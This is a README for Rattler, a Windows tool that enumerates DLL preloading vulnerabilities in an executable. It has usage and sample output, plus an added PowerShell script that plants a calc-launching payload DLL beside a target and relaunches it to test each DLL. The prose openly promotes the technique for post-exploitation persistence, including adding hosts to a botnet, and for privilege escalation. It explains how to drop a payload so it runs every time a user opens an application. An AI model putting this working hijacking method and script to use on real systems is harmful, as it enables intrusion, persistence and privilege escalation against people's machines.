# Automated DLL Enumerator: rattler

## Usage

Depending on where the target executable lives, Rattler may need to be run with elevated permissions, since the test involves writing payload DLLs to a location the target loads from.

```
Rattler_32.exe "c:\path\to\target\application.exe" 1
```

• `"c:\path\to\target\application.exe"` = path to the executable you want to enumerate.
• `1` = enumeration mode; only one mode exists at this point.

Example run (the output below shows only some of the 43 DLLs tested):

```
C:\Users\User\Desktop>Rattler_32.exe "C:\Users\User\Downloads\NDP462-KB3151800-x86-x64-AllOS-ENU.exe"  1
[+] RATTLER
[+] STARTING UP...
[*] TARGET PROCESS ID: 3504
[+] IMPLEMENTING EXECUTABLE TEST

[*] TARGETING DLL-> C:\Windows\SYSTEM32\CRYPTSP.dll
[*] INFO: DLL IS VULNERABLE TO EXECUTABLE TEST-> C:\Windows\SYSTEM32\CRYPTSP.dll

[*] TARGETING DLL-> C:\Windows\system32\rsaenh.dll
[*] TARGET DLL IS NOT VULNERABLE TO EXECUTABLE TEST

[*] TARGETING DLL-> C:\Windows\SYSTEM32\ntmarta.dll
[*] TARGET DLL IS NOT VULNERABLE TO EXECUTABLE TEST

[*] TARGETING DLL-> C:\Windows\SYSTEM32\feclient.dll
[*] TARGET DLL IS NOT VULNERABLE TO EXECUTABLE TEST

[*] TARGETING DLL-> C:\Windows\system32\uxtheme.dll
[*] TARGET DLL IS NOT VULNERABLE TO EXECUTABLE TEST

[*] TARGETING DLL-> C:\Windows\System32\MSCTF.dll
[*] TARGET DLL IS NOT VULNERABLE TO EXECUTABLE TEST

[*] TARGETING DLL-> C:\Windows\system32\dwmapi.dll
[*] TARGET DLL IS NOT VULNERABLE TO EXECUTABLE TEST

[+] EXECUTABLE TEST TOTAL DLL's IDENTIFIED: 43
[+] EXECUTABLE TEST TOTAL VULN COUNT: 1
[*] EXECUTABLE TEST VULNERABLE DLL-> C:\Windows\SYSTEM32\CRYPTSP.dll
```


## Information

Rattler is written in C++ and built with Microsoft Visual Studio 2015. It can test both 32-bit and 64-bit applications. Rattler's default "payload" is a DLL (payload.dll) that invokes calc.exe; the default payload is 32-bit. To enumerate a 64-bit target, use the 64-bit Rattler executable together with a 64-bit payload DLL.

## Why do I use Rattler?

Rattler makes it quick and easy to identify a vector for getting a payload executed. For example, if an application loads ~100 DLLs and each takes ~2 minutes to test by hand, that is over three hours of manual testing for a single application. The process for testing an application for DLL preloading vulnerabilities is also simple and automates trivially with some C++, a few Windows API calls and fresh beard oil, hence Rattler.

Sure, exploiting a DLL preloading vulnerability has prerequisites (write access to the directory the loader searches, and so on), but the three most useful cases are all post-exploitation: persistence, privilege escalation and, in some cases, RCE. When pwning a host you may want persistence, whether to add it to your botnet or merely to pivot from it. One way to gain persistence is to exploit a DLL preloading vulnerability on the target host.

For example, if the target host has VoiceAndVideoApplicationX.exe installed and that executable is vulnerable to DLL preloading, all I need to do is identify a vulnerable DLL using Rattler, drop my payload under that DLL's name into the appropriate directory (the one the loader searches before the real DLL's location), and voila: every time the user or host runs VoiceAndVideoApplicationX.exe, my payload is executed as well.
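As an added illustration of the executable test described above and of the persistence scenario (this is not Rattler's own code): a PowerShell harness that performs the same test by hand. It assumes a hypothetical `payload.dll` in the current directory whose `DllMain` launches calc.exe (Rattler's default payload behaves this way, but any DLL that spawns the calculator will do). It runs the target once to record the DLLs it loads, then for each DLL resolved from outside the application's directory plants the payload under that DLL's name next to the executable, relaunches the target, and reports the DLL as vulnerable if a calculator process appears. The script name `Test-DllPreload.ps1` is likewise an assumption.

```powershell
# Added example, not part of Rattler: manual DLL preloading test in PowerShell.
# Assumption: $Payload points to a DLL whose DllMain starts calc.exe.
param(
    [Parameter(Mandatory = $true)][string]$Target,
    [string]$Payload = ".\payload.dll",   # hypothetical calc-spawning DLL
    [int]$SettleSeconds = 3               # time to let the target finish loading
)

$Target    = (Resolve-Path $Target).Path
$Payload   = (Resolve-Path $Payload).Path
$appDir    = Split-Path -Parent $Target
$calcNames = @('calc', 'Calculator', 'CalculatorApp')   # calc.exe and its Store-app successors

function Get-LoadedDlls {
    # Run the target untouched once and record every module it loads.
    $p = Start-Process -FilePath $Target -WorkingDirectory $appDir -PassThru
    Start-Sleep -Seconds $SettleSeconds
    try {
        $p.Refresh()
        $mods = $p.Modules | ForEach-Object { $_.FileName }
    } finally {
        Stop-Process -Id $p.Id -Force -ErrorAction SilentlyContinue
    }
    # Skip the EXE itself and anything already resolved from the app directory:
    # a same-named file there would overwrite the real DLL, not preload it.
    $mods |
        Where-Object { $_ -ne $Target -and (Split-Path -Parent $_) -ne $appDir } |
        Sort-Object -Unique
}

function Test-Preload([string]$dllPath) {
    # Plant the payload under the DLL's name next to the EXE, run the EXE,
    # and report whether the payload fired (a calculator process appeared).
    $planted = Join-Path $appDir (Split-Path -Leaf $dllPath)
    Get-Process -Name $calcNames -ErrorAction SilentlyContinue | Stop-Process -Force
    try {
        Copy-Item -Path $Payload -Destination $planted -ErrorAction Stop
    } catch {
        return [pscustomobject]@{ Dll = $dllPath; Result = "SKIPPED (cannot write $planted)" }
    }
    $fired = $false
    $p = $null
    try {
        $p = Start-Process -FilePath $Target -WorkingDirectory $appDir -PassThru
        Start-Sleep -Seconds $SettleSeconds
        $fired = $null -ne (Get-Process -Name $calcNames -ErrorAction SilentlyContinue)
    } finally {
        # Always clean up: kill the target and the calculator, remove the planted DLL.
        if ($p) { Stop-Process -Id $p.Id -Force -ErrorAction SilentlyContinue }
        Get-Process -Name $calcNames -ErrorAction SilentlyContinue | Stop-Process -Force
        Remove-Item -Path $planted -Force -ErrorAction SilentlyContinue
    }
    [pscustomobject]@{
        Dll    = $dllPath
        Result = $(if ($fired) { 'VULNERABLE' } else { 'not vulnerable' })
    }
}

$dlls = @(Get-LoadedDlls)
Write-Host "[+] $($dlls.Count) candidate DLLs loaded from outside $appDir"
$results = foreach ($d in $dlls) { Test-Preload $d }
$results | Format-Table -AutoSize
$results | Where-Object { $_.Result -eq 'VULNERABLE' } |
    ForEach-Object { Write-Host "[*] VULNERABLE DLL-> $($_.Dll)" }
```

Run it as `.\Test-DllPreload.ps1 -Target "C:\path\to\application.exe"` from a prompt whose bitness matches the target (a 32-bit PowerShell cannot read the module list of a 64-bit process), and elevate it if the application's directory is not writable by the current user. DLLs on the KnownDLLs list never resolve to the planted copy, which is the usual reason a SYSTEM32 DLL comes back as not vulnerable, and a target that exits before `$SettleSeconds` elapses (a short-lived installer, for instance) will need a larger value or the module list will be unreadable.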

Another use for Rattler is privilege escalation. One of the golden rules of pwning is that you inherit the permissions of the entity you exploit.